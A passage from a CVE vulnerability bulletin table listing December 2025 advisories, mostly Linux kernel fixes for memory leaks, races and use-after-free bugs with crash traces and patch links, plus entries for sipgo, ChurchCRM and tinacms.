wake_up_klogd_work_func+0x60/0x60 blk_mq_alloc_request+0x2b7/0x6b0 ? __blk_mq_alloc_requests+0x1060/0x1060 ? __switch_to+0x5b7/0x1060 nvme_submit_user_cmd+0xa9/0x330 nvme_user_cmd.isra.0+0x240/0x3f0 ? force_sigsegv+0xe0/0xe0 ? nvme_user_cmd64+0x400/0x400 ? vfs_fileattr_set+0x9b0/0x9b0 ? cgroup_update_frozen_flag+0x24/0x1c0 ? cgroup_leave_frozen+0x204/0x330 ? nvme_ioctl+0x7c/0x2c0 blkdev_ioctl+0x1a8/0x4d0 ? blkdev_common_ioctl+0x1930/0x1930 ? fdget+0x54/0x380 __x64_sys_ioctl+0x129/0x190 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f765f703b0b Code: ff ff ff 85 c0 79 9b 49 c7 c4 ff ff ff ff 5b 5d 4c 89 e0 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d dd 52 0f 00 f7 d8 64 89 01 48 RSP: 002b:00007ffe2cefe808 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007ffe2cefe860 RCX: 00007f765f703b0b RDX: 00007ffe2cefe860 RSI: 00000000c0484e41 RDI: 0000000000000003 RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000 R10: 00007f765f611d50 R11: 0000000000000202 R12: 0000000000000003 R13: 00000000c0484e41 R14: 0000000000000001 R15: 00007ffe2cefea60 </TASK> | 2025-12-16 | not yet calculated | CVE-2025-68265 | https://git.kernel.org/stable/c/e8061d02b49c5c901980f58d91e96580e9a14acf https://git.kernel.org/stable/c/e7dac681790556c131854b97551337aa8042215b https://git.kernel.org/stable/c/03b3bcd319b3ab5182bc9aaa0421351572c78ac0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bfs: Reconstruct file type when loading from disk syzbot is reporting that S_IFMT bits of inode->i_mode can become bogus when the S_IFMT bits of the 32bits "mode" field loaded from disk are corrupted or when the 32bits "attributes" field loaded from disk are corrupted. A documentation says that BFS uses only lower 9 bits of the "mode" field. But I can't find an explicit explanation that the unused upper 23 bits (especially, the S_IFMT bits) are initialized with 0. Therefore, ignore the S_IFMT bits of the "mode" field loaded from disk. Also, verify that the value of the "attributes" field loaded from disk is either BFS_VREG or BFS_VDIR (because BFS supports only regular files and the root directory). | 2025-12-16 | not yet calculated | CVE-2025-68266 | https://git.kernel.org/stable/c/77899444d46162aeb65f229590c26ba266864223 https://git.kernel.org/stable/c/a8cb796e7e2cb7971311ba236922f5e7e1be77e6 https://git.kernel.org/stable/c/34ab4c75588c07cca12884f2bf6b0347c7a13872 |
| emiago--sipgo | SIPGO is a library for writing SIP services in the GO language. Starting in version 0.3.0 and prior to version 1.0.0-alpha-1, a nil pointer dereference vulnerability is in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header. The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases. This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function. Version 1.0.0-alpha-1 contains a patch for the issue. | 2025-12-16 | not yet calculated | CVE-2025-68274 | https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Versions prior to 6.5.3 have a stored cross-site scripting vulnerability on the pages `View Active People`, `View Inactive people`, and `View All People`. Version 6.5.3 fixes the issue. | 2025-12-17 | not yet calculated | CVE-2025-68275 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3q97-q4hv-gxwr |
| tinacms--tinacms | Tina is a headless content management system. In tinacms prior to version 3.1.1, tinacms uses the gray-matter package in an insecure way allowing attackers that can control the content of the processed markdown files, e.g., blog posts, to execute arbitrary code. tinacms version 3.1.1, @tinacms/cli version 2.0.4, and @tinacms/graphql version 2.0.3 contain a fix for the issue. | 2025-12-18 | not yet calculated | CVE-2025-68278 | https://github.com/tinacms/tinacms/security/advisories/GHSA-529f-9qwm-9628 https://github.com/tinacms/tinacms/commit/fa7c27abef968e3f3a3e7d564f282bc566087569 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: SDCA: bug fix while parsing mipi-sdca-control-cn-list "struct sdca_control" declares "values" field as integer array. But the memory allocated to it is of char array. This causes crash for sdca_parse_function API. This patch addresses the issue by allocating correct data size. | 2025-12-16 | not yet calculated | CVE-2025-68281 | https://git.kernel.org/stable/c/fcd5786b506c51cbabc2560c68e040d8dba22a0d https://git.kernel.org/stable/c/eb2d6774cc0d9d6ab8f924825695a85c14b2e0c2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: udc: fix use-after-free in usb_gadget_state_work A race condition during gadget teardown can lead to a use-after-free in usb_gadget_state_work(), as reported by KASAN: BUG: KASAN: invalid-access in sysfs_notify+0x2c/0xd0 Workqueue: events usb_gadget_state_work The fundamental race occurs because a concurrent event (e.g., an interrupt) can call usb_gadget_set_state() and schedule gadget->work at any time during the cleanup process in usb_del_gadget(). Commit 399a45e5237c ("usb: gadget: core: flush gadget workqueue after device removal") attempted to fix this by moving flush_work() to after device_del(). However, this does not fully solve the race, as a new work item can still be scheduled *after* flush_work() completes but before the gadget's memory is freed, leading to the same use-after-free. This patch fixes the race condition robustly by introducing a 'teardown' flag and a 'state_lock' spinlock to the usb_gadget struct. The flag is set during cleanup in usb_del_gadget() *before* calling flush_work() to prevent any new work from being scheduled once cleanup has commenced. The scheduling site, usb_gadget_set_state(), now checks this flag under the lock before queueing the work, thus safely closing the race window. | 2025-12-16 | not yet calculated | CVE-2025-68282 | https://git.kernel.org/stable/c/c12a0c3ef815ddd67e47f9c819f9fe822fed5467 https://git.kernel.org/stable/c/f02a412c0a18f02f0f91b0a3d9788315a721b7fd https://git.kernel.org/stable/c/10014310193cf6736c1aeb4105c5f4a0818d0c65 https://git.kernel.org/stable/c/3b32caa73d135eea8fb9cabb45e9fc64c5a3ecb9 https://git.kernel.org/stable/c/baeb66fbd4201d1c4325074e78b1f557dff89b5b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: replace BUG_ON with bounds check for map->max_osd OSD indexes come from untrusted network packets. Boundary checks are added to validate these against map->max_osd. [ idryomov: drop BUG_ON in ceph_get_primary_affinity(), minor cosmetic edits ] | 2025-12-16 | not yet calculated | CVE-2025-68283 | https://git.kernel.org/stable/c/57f5fbae9f1024aba17ff75e00433324115c548a https://git.kernel.org/stable/c/becc488a4d864db338ebd4e313aa3c77da24b604 https://git.kernel.org/stable/c/e67e3be690f5f7e3b031cf29e8d91e6d02a8e30d https://git.kernel.org/stable/c/b4368b7f97014e1015445d61abd0b27c4c6e8424 https://git.kernel.org/stable/c/ec3797f043756a94ea2d0f106022e14ac4946c02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() The len field originates from untrusted network packets. Boundary checks have been added to prevent potential out-of-bounds writes when decrypting the connection secret or processing service tickets. [ idryomov: changelog ] | 2025-12-16 | not yet calculated | CVE-2025-68284 | https://git.kernel.org/stable/c/f22c55a20a2d9ffbbac57408d5d488cef8201e9d https://git.kernel.org/stable/c/8dfcc56af28cffb8f25fb9be37b3acc61f2a3d09 https://git.kernel.org/stable/c/ccbccfba25e9aa395daaea156b5e7790910054c4 https://git.kernel.org/stable/c/5ef575834ca99f719d7573cdece9df2fe2b72424 https://git.kernel.org/stable/c/6920ff09bf911bc919cd7a6b7176fbdd1a6e6850 https://git.kernel.org/stable/c/7fce830ecd0a0256590ee37eb65a39cbad3d64fc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: fix potential use-after-free in have_mon_and_osd_map() The wait loop in __ceph_open_session() can race with the client receiving a new monmap or osdmap shortly after the initial map is received. Both ceph_monc_handle_map() and handle_one_map() install a new map immediately after freeing the old one kfree(monc->monmap); monc->monmap = monmap; ceph_osdmap_destroy(osdc->osdmap); osdc->osdmap = newmap; under client->monc.mutex and client->osdc.lock respectively, but because neither is taken in have_mon_and_osd_map() it's possible for client->monc.monmap->epoch and client->osdc.osdmap->epoch arms in client->monc.monmap && client->monc.monmap->epoch && client->osdc.osdmap && client->osdc.osdmap->epoch; condition to dereference an already freed map. This happens to be reproducible with generic/395 and generic/397 with KASAN enabled: BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70 Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305 CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266 ... Call Trace: <TASK> have_mon_and_osd_map+0x56/0x70 ceph_open_session+0x182/0x290 ceph_get_tree+0x333/0x680 vfs_get_tree+0x49/0x180 do_new_mount+0x1a3/0x2d0 path_mount+0x6dd/0x730 do_mount+0x99/0xe0 __do_sys_mount+0x141/0x180 do_syscall_64+0x9f/0x100 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> Allocated by task 13305: ceph_osdmap_alloc+0x16/0x130 ceph_osdc_init+0x27a/0x4c0 ceph_create_client+0x153/0x190 create_fs_client+0x50/0x2a0 ceph_get_tree+0xff/0x680 vfs_get_tree+0x49/0x180 do_new_mount+0x1a3/0x2d0 path_mount+0x6dd/0x730 do_mount+0x99/0xe0 __do_sys_mount+0x141/0x180 do_syscall_64+0x9f/0x100 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 9475: kfree+0x212/0x290 handle_one_map+0x23c/0x3b0 ceph_osdc_handle_map+0x3c9/0x590 mon_dispatch+0x655/0x6f0 ceph_con_process_message+0xc3/0xe0 ceph_con_v1_try_read+0x614/0x760 ceph_con_workfn+0x2de/0x650 process_one_work+0x486/0x7c0 process_scheduled_works+0x73/0x90 worker_thread+0x1c8/0x2a0 kthread+0x2ec/0x300 ret_from_fork+0x24/0x40 ret_from_fork_asm+0x1a/0x30 Rewrite the wait loop to check the above condition directly with client->monc.mutex and client->osdc.lock taken as appropriate. While at it, improve the timeout handling (previously mount_timeout could be exceeded in case wait_event_interruptible_timeout() slept more than once) and access client->auth_err under client->monc.mutex to match how it's set in finish_auth(). monmap_show() and osdmap_show() now take the respective lock before accessing the map as well. | 2025-12-16 | not yet calculated | CVE-2025-68285 | https://git.kernel.org/stable/c/bb4910c5fd436701faf367e1b5476a5a6d2aff1c https://git.kernel.org/stable/c/05ec43e9a9de67132dc8cd3b22afef001574947f https://git.kernel.org/stable/c/7c8ccdc1714d9fabecd26e1be7db1771061acc6e https://git.kernel.org/stable/c/183ad6e3b651e8fb0b66d6a2678f4b80bfbba092 https://git.kernel.org/stable/c/e08021b3b56b2407f37b5fe47b654be80cc665fb https://git.kernel.org/stable/c/3fc43120b22a3d4f1fbeff56a35ce2105b6a5683 https://git.kernel.org/stable/c/076381c261374c587700b3accf410bdd2dba334e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check NULL before accessing [WHAT] IGT kms_cursor_legacy's long-nonblocking-modeset-vs-cursor-atomic fails with NULL pointer dereference. This can be reproduced with both an eDP panel and a DP monitors connected. BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 13 UID: 0 PID: 2960 Comm: kms_cursor_lega Not tainted 6.16.0-99-custom #8 PREEMPT(voluntary) Hardware name: AMD ........ RIP: 0010:dc_stream_get_scanoutpos+0x34/0x130 [amdgpu] Code: 57 4d 89 c7 41 56 49 89 ce 41 55 49 89 d5 41 54 49 89 fc 53 48 83 ec 18 48 8b 87 a0 64 00 00 48 89 75 d0 48 c7 c6 e0 41 30 c2 <48> 8b 38 48 8b 9f 68 06 00 00 e8 8d d7 fd ff 31 c0 48 81 c3 e0 02 RSP: 0018:ffffd0f3c2bd7608 EFLAGS: 00010292 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffd0f3c2bd7668 RDX: ffffd0f3c2bd7664 RSI: ffffffffc23041e0 RDI: ffff8b32494b8000 RBP: ffffd0f3c2bd7648 R08: ffffd0f3c2bd766c R09: ffffd0f3c2bd7760 R10: ffffd0f3c2bd7820 R11: 0000000000000000 R12: ffff8b32494b8000 R13: ffffd0f3c2bd7664 R14: ffffd0f3c2bd7668 R15: ffffd0f3c2bd766c FS: 000071f631b68700(0000) GS:ffff8b399f114000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 00000001b8105000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> dm_crtc_get_scanoutpos+0xd7/0x180 [amdgpu] amdgpu_display_get_crtc_scanoutpos+0x86/0x1c0 [amdgpu] ? __pfx_amdgpu_crtc_get_scanout_position+0x10/0x10[amdgpu] amdgpu_crtc_get_scanout_position+0x27/0x50 [amdgpu] drm_crtc_vblank_helper_get_vblank_timestamp_internal+0xf7/0x400 drm_crtc_vblank_helper_get_vblank_timestamp+0x1c/0x30 drm_crtc_get_last_vbltimestamp+0x55/0x90 drm_crtc_next_vblank_start+0x45/0xa0 drm_atomic_helper_wait_for_fences+0x81/0x1f0 ... (cherry picked from commit 621e55f1919640acab25383362b96e65f2baea3c) | 2025-12-16 | not yet calculated | CVE-2025-68286 | https://git.kernel.org/stable/c/781f2f32e9c19eb791b52af283c96f9a9677a7f2 https://git.kernel.org/stable/c/09092269cb762378ca8b56024746b1a136761e0d https://git.kernel.org/stable/c/109e9c92543f3105e8e1efd2c5e6b92ef55d5743 https://git.kernel.org/stable/c/9d1a65cbe3ec5da3003c8434ac7a38dcdc958fd9 https://git.kernel.org/stable/c/f7cf491cd5b54b5a093bd3fdf76fa2860a7522bf https://git.kernel.org/stable/c/62150f1e7ec707da76ff353fb7db51fef9cd6557 https://git.kernel.org/stable/c/3ce62c189693e8ed7b3abe551802bbc67f3ace54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: Fix race condition between concurrent dwc3_remove_requests() call paths This patch addresses a race condition caused by unsynchronized execution of multiple call paths invoking `dwc3_remove_requests()`, leading to premature freeing of USB requests and subsequent crashes. Three distinct execution paths interact with `dwc3_remove_requests()`: Path 1: Triggered via `dwc3_gadget_reset_interrupt()` during USB reset handling. The call stack includes: - `dwc3_ep0_reset_state()` - `dwc3_ep0_stall_and_restart()` - `dwc3_ep0_out_start()` - `dwc3_remove_requests()` - `dwc3_gadget_del_and_unmap_request()` Path 2: Also initiated from `dwc3_gadget_reset_interrupt()`, but through `dwc3_stop_active_transfers()`. The call stack includes: - `dwc3_stop_active_transfers()` - `dwc3_remove_requests()` - `dwc3_gadget_del_and_unmap_request()` Path 3: Occurs independently during `adb root` execution, which triggers USB function unbind and bind operations. The sequence includes: - `gserial_disconnect()` - `usb_ep_disable()` - `dwc3_gadget_ep_disable()` - `dwc3_remove_requests()` with `-ESHUTDOWN` status Path 3 operates asynchronously and lacks synchronization with Paths 1 and 2. When Path 3 completes, it disables endpoints and frees 'out' requests. If Paths 1 or 2 are still processing these requests, accessing freed memory leads to a crash due to use-after-free conditions. To fix this added check for request completion and skip processing if already completed and added the request status for ep0 while queue. | 2025-12-16 | not yet calculated | CVE-2025-68287 | https://git.kernel.org/stable/c/467add9db13219101f14b6cc5477998b4aaa5fe2 https://git.kernel.org/stable/c/67192e8cb7f941b5bba91e4bb290683576ce1607 https://git.kernel.org/stable/c/47de14d741cc4057046c9e2f33df1f7828254e6c https://git.kernel.org/stable/c/afc0e34f161ce61ad351303c46eb57bd44b8b090 https://git.kernel.org/stable/c/7cfb62888eba292fa35cd9ddbd28ce595f60e139 https://git.kernel.org/stable/c/fa5eaf701e576880070b60922200557ae4aa54e1 https://git.kernel.org/stable/c/e4037689a366743c4233966f0e74bc455820d316 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: storage: Fix memory leak in USB bulk transport A kernel memory leak was identified by the 'ioctl_sg01' test from Linux Test Project (LTP). The following bytes were mainly observed: 0x53425355. When USB storage devices incorrectly skip the data phase with status data, the code extracts/validates the CSW from the sg buffer, but fails to clear it afterwards. This leaves status protocol data in srb's transfer buffer, such as the US_BULK_CS_SIGN 'USBS' signature observed here. Thus, this can lead to USB protocols leaks to user space through SCSI generic (/dev/sg*) interfaces, such as the one seen here when the LTP test requested 512 KiB. Fix the leak by zeroing the CSW data in srb's transfer buffer immediately after the validation of devices that skip data phase. Note: Differently from CVE-2018-1000204, which fixed a big leak by zero- ing pages at allocation time, this leak occurs after allocation, when USB protocol data is written to already-allocated sg pages. | 2025-12-16 | not yet calculated | CVE-2025-68288 | https://git.kernel.org/stable/c/83f0241959831586d9b6d47f6bd5d3dec8f43bf0 https://git.kernel.org/stable/c/4ba515dfff7eeca369ab85cdbb3f3b231c71720c https://git.kernel.org/stable/c/467fec3cefbeb9e3ea80f457da9a5666a71ca0d0 https://git.kernel.org/stable/c/cb1401b5bcc2feb5b038fc4b512e5968b016e05e https://git.kernel.org/stable/c/0f18eac44c5668204bf6eebb01ddb369ac56932b https://git.kernel.org/stable/c/5b815ddb3f5560fac35b16de3a2a22d5f81c5993 https://git.kernel.org/stable/c/41e99fe2005182139b1058db71f0d241f8f0078c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_eem: Fix memory leak in eem_unwrap The existing code did not handle the failure case of usb_ep_queue in the command path, potentially leading to memory leaks. Improve error handling to free all allocated resources on usb_ep_queue failure. This patch continues to use goto logic for error handling, as the existing error handling is complex and not easily adaptable to auto-cleanup helpers. kmemleak results: unreferenced object 0xffffff895a512300 (size 240): backtrace: slab_post_alloc_hook+0xbc/0x3a4 kmem_cache_alloc+0x1b4/0x358 skb_clone+0x90/0xd8 eem_unwrap+0x1cc/0x36c unreferenced object 0xffffff8a157f4000 (size 256): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc kmalloc_trace+0x48/0x140 dwc3_gadget_ep_alloc_request+0x58/0x11c usb_ep_alloc_request+0x40/0xe4 eem_unwrap+0x204/0x36c unreferenced object 0xffffff8aadbaac00 (size 128): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc __kmalloc+0x64/0x1a8 eem_unwrap+0x218/0x36c unreferenced object 0xffffff89ccef3500 (size 64): backtrace: slab_post_alloc_hook+0xbc/0x3a4 __kmem_cache_alloc_node+0x1b4/0x2dc kmalloc_trace+0x48/0x140 eem_unwrap+0x238/0x36c | 2025-12-16 | not yet calculated | CVE-2025-68289 | https://git.kernel.org/stable/c/a9985a88b2fc29fbe1657fe8518908e261d6889c https://git.kernel.org/stable/c/5a1628283cd9dccf1e44acfb74e77504f4dc7472 https://git.kernel.org/stable/c/0ac07e476944a5e4c2b8b087dd167dec248c1bdf https://git.kernel.org/stable/c/41434488ca714ab15cb2a4d0378418d1be8052d2 https://git.kernel.org/stable/c/e72c963177c708a167a7e17ed6c76320815157cf https://git.kernel.org/stable/c/0dea2e0069a7e9aa034696f8065945b7be6dd6b7 https://git.kernel.org/stable/c/e4f5ce990818d37930cd9fb0be29eee0553c59d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: fix double free on late probe failure The MOST subsystem has a non-standard registration function which frees the interface on registration failures and on deregistration. This unsurprisingly leads to bugs in the MOST drivers, and a couple of recent changes turned a reference underflow and use-after-free in the USB driver into several double free and a use-after-free on late probe failures. | 2025-12-16 | not yet calculated | CVE-2025-68290 | https://git.kernel.org/stable/c/90e6ce2b1b19fb8b9d4afee69f40e4c6a4791154 https://git.kernel.org/stable/c/a4c4118c2af284835b16431bbfe77e0130c06fef https://git.kernel.org/stable/c/0dece48660be16918ecf2dbdc7193e8be03e1693 https://git.kernel.org/stable/c/993bfdc3842893c394de13c8200c338ebb979589 https://git.kernel.org/stable/c/2274767dc02b756b25e3db1e31c0ed47c2a78442 https://git.kernel.org/stable/c/8d8ffefe3d5d8b7b73efb866db61130107299c5c https://git.kernel.org/stable/c/baadf2a5c26e802a46573eaad331b427b49aaa36 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: Initialise rcv_mss before calling tcp_send_active_reset() in mptcp_do_fastclose(). syzbot reported divide-by-zero in __tcp_select_window() by MPTCP socket. [0] We had a similar issue for the bare TCP and fixed in commit 499350a5a6e7 ("tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0"). Let's apply the same fix to mptcp_do_fastclose(). [0]: Oops: divide error: 0000 [#1] SMP KASAN PTI CPU: 0 UID: 0 PID: 6068 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 RIP: 0010:__tcp_select_window+0x824/0x1320 net/ipv4/tcp_output.c:3336 Code: ff ff ff 44 89 f1 d3 e0 89 c1 f7 d1 41 01 cc 41 21 c4 e9 a9 00 00 00 e8 ca 49 01 f8 e9 9c 00 00 00 e8 c0 49 01 f8 44 89 e0 99 <f7> 7c 24 1c 41 29 d4 48 bb 00 00 00 00 00 fc ff df e9 80 00 00 00 RSP: 0018:ffffc90003017640 EFLAGS: 00010293 RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff88807b469e40 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 RBP: ffffc90003017730 R08: ffff888033268143 R09: 1ffff1100664d028 R10: dffffc0000000000 R11: ffffed100664d029 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 000055557faa0500(0000) GS:ffff888126135000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f64a1912ff8 CR3: 0000000072122000 CR4: 00000000003526f0 Call Trace: <TASK> tcp_select_window net/ipv4/tcp_output.c:281 [inline] __tcp_transmit_skb+0xbc7/0x3aa0 net/ipv4/tcp_output.c:1568 tcp_transmit_skb net/ipv4/tcp_output.c:1649 [inline] tcp_send_active_reset+0x2d1/0x5b0 net/ipv4/tcp_output.c:3836 mptcp_do_fastclose+0x27e/0x380 net/mptcp/protocol.c:2793 mptcp_disconnect+0x238/0x710 net/mptcp/protocol.c:3253 mptcp_sendmsg_fastopen+0x2f8/0x580 net/mptcp/protocol.c:1776 mptcp_sendmsg+0x1774/0x1980 net/mptcp/protocol.c:1855 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg+0xe5/0x270 net/socket.c:742 __sys_sendto+0x3bd/0x520 net/socket.c:2244 __do_sys_sendto net/socket.c:2251 [inline] __se_sys_sendto net/socket.c:2247 [inline] __x64_sys_sendto+0xde/0x100 net/socket.c:2247 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f66e998f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffff9acedb8 EFLAGS: 00000246 ORIG_RAX: 000000000000002c RAX: ffffffffffffffda RBX: 00007f66e9be5fa0 RCX: 00007f66e998f749 RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 00007ffff9acee10 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001 R13: 00007f66e9be5fa0 R14: 00007f66e9be5fa0 R15: 0000000000000006 </TASK> | 2025-12-16 | not yet calculated | CVE-2025-68291 | https://git.kernel.org/stable/c/05f5e26d488cdc7abc2a826cf1071782d5a21203 https://git.kernel.org/stable/c/88163f85d59b4164884df900ee171720fd26686b https://git.kernel.org/stable/c/f07f4ea53e22429c84b20832fa098b5ecc0d4e35 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/memfd: fix information leak in hugetlb folios When allocating hugetlb folios for memfd, three initialization steps are missing: 1. Folios are not zeroed, leading to kernel memory disclosure to userspace 2. Folios are not marked uptodate before adding to page cache 3. hugetlb_fault_mutex is not taken before hugetlb_add_to_page_cache() The memfd allocation path bypasses the normal page fault handler (hugetlb_no_page) which would handle all of these initialization steps. This is problematic especially for udmabuf use cases where folios are pinned and directly accessed by userspace via DMA. Fix by matching the initialization pattern used in hugetlb_no_page(): - Zero the folio using folio_zero_user() which is optimized for huge pages - Mark it uptodate with folio_mark_uptodate() - Take hugetlb_fault_mutex before adding to page cache to prevent races The folio_zero_user() change also fixes a potential security issue where uninitialized kernel memory could be disclosed to userspace through read() or mmap() operations on the memfd. | 2025-12-16 | not yet calculated | CVE-2025-68292 | https://git.kernel.org/stable/c/50b4c1c28733a536d637d2f0401d60bcfef60ef2 https://git.kernel.org/stable/c/b09d7c4dc642849d9a96753233c6d00364017fd6 https://git.kernel.org/stable/c/de8798965fd0d9a6c47fc2ac57767ec32de12b49 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/huge_memory: fix NULL pointer deference when splitting folio Commit c010d47f107f ("mm: thp: split huge page to any lower order pages") introduced an early check on the folio's order via mapping->flags before proceeding with the split work. This check introduced a bug: for shmem folios in the swap cache and truncated folios, the mapping pointer can be NULL. Accessing mapping->flags in this state leads directly to a NULL pointer dereference. This commit fixes the issue by moving the check for mapping != NULL before any attempt to access mapping->flags. | 2025-12-16 | not yet calculated | CVE-2025-68293 | https://git.kernel.org/stable/c/592db83615a9f0164472ec789c2ed34ad35f732f https://git.kernel.org/stable/c/d1b83fbacd4397a1d2f8c6b13427a8636ae2b307 https://git.kernel.org/stable/c/cff47b9e39a6abf03dde5f4f156f841b0c54bba0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/net: ensure vectored buffer node import is tied to notification When support for vectored registered buffers was added, the import itself is using 'req' rather than the notification io_kiocb, sr->notif. For non-vectored imports, sr->notif is correctly used. This is important as the lifetime of the two may be different. Use the correct io_kiocb for the vectored buffer import. | 2025-12-16 | not yet calculated | CVE-2025-68294 | https://git.kernel.org/stable/c/14459281e027f23b70885c1cc1032a71c0efd8d7 https://git.kernel.org/stable/c/f6041803a831266a2a5a5b5af66f7de0845bcbf3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix memory leak in cifs_construct_tcon() When having a multiuser mount with domain= specified and using cifscreds, cifs_set_cifscreds() will end up setting @ctx->domainname, so it needs to be freed before leaving cifs_construct_tcon(). This fixes the following memory leak reported by kmemleak: mount.cifs //srv/share /mnt -o domain=ZELDA,multiuser,... su - testuser cifscreds add -d ZELDA -u testuser ... ls /mnt/1 ... umount /mnt echo scan > /sys/kernel/debug/kmemleak cat /sys/kernel/debug/kmemleak unreferenced object 0xffff8881203c3f08 (size 8): comm "ls", pid 5060, jiffies 4307222943 hex dump (first 8 bytes): 5a 45 4c 44 41 00 cc cc ZELDA... backtrace (crc d109a8cf): __kmalloc_node_track_caller_noprof+0x572/0x710 kstrdup+0x3a/0x70 cifs_sb_tlink+0x1209/0x1770 [cifs] cifs_get_fattr+0xe1/0xf50 [cifs] cifs_get_inode_info+0xb5/0x240 [cifs] cifs_revalidate_dentry_attr+0x2d1/0x470 [cifs] cifs_getattr+0x28e/0x450 [cifs] vfs_getattr_nosec+0x126/0x180 vfs_statx+0xf6/0x220 do_statx+0xab/0x110 __x64_sys_statx+0xd5/0x130 do_syscall_64+0xbb/0x380 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2025-12-16 | not yet calculated | CVE-2025-68295 | https://git.kernel.org/stable/c/ff8f9bd1c46ee02d5558293915d42e82646d5ee9 https://git.kernel.org/stable/c/d146e96fef876492979658dce644305de35878d4 https://git.kernel.org/stable/c/3dd546e867e94c2f954bca45a961b6104ba708b6 https://git.kernel.org/stable/c/f62ffdfb431bdfa4b6d24233b7fd830eca0b801e https://git.kernel.org/stable/c/f15288c137d960836277d0e3ecc62de68e52f00f https://git.kernel.org/stable/c/a67e91d5f446e455dd9201cdd6e865f7078d251d https://git.kernel.org/stable/c/3184b6a5a24ec9ee74087b2a550476f386df7dc2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup Protect vga_switcheroo_client_fb_set() with console lock. Avoids OOB access in fbcon_remap_all(). Without holding the console lock the call races with switching outputs. VGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon function uses struct fb_info.node, which is set by register_framebuffer(). As the fb-helper code currently sets up VGA switcheroo before registering the framebuffer, the value of node is -1 and therefore not a legal value. For example, fbcon uses the value within set_con2fb_map() [1] as an index into an array. Moving vga_switcheroo_client_fb_set() after register_framebuffer() can result in VGA switching that does not switch fbcon correctly. Therefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(), which already holds the console lock. Fbdev calls fbcon_fb_registered() from within register_framebuffer(). Serializes the helper with VGA switcheroo's call to fbcon_remap_all(). Although vga_switcheroo_client_fb_set() takes an instance of struct fb_info as parameter, it really only needs the contained fbcon state. Moving the call to fbcon initialization is therefore cleaner than before. Only amdgpu, i915, nouveau 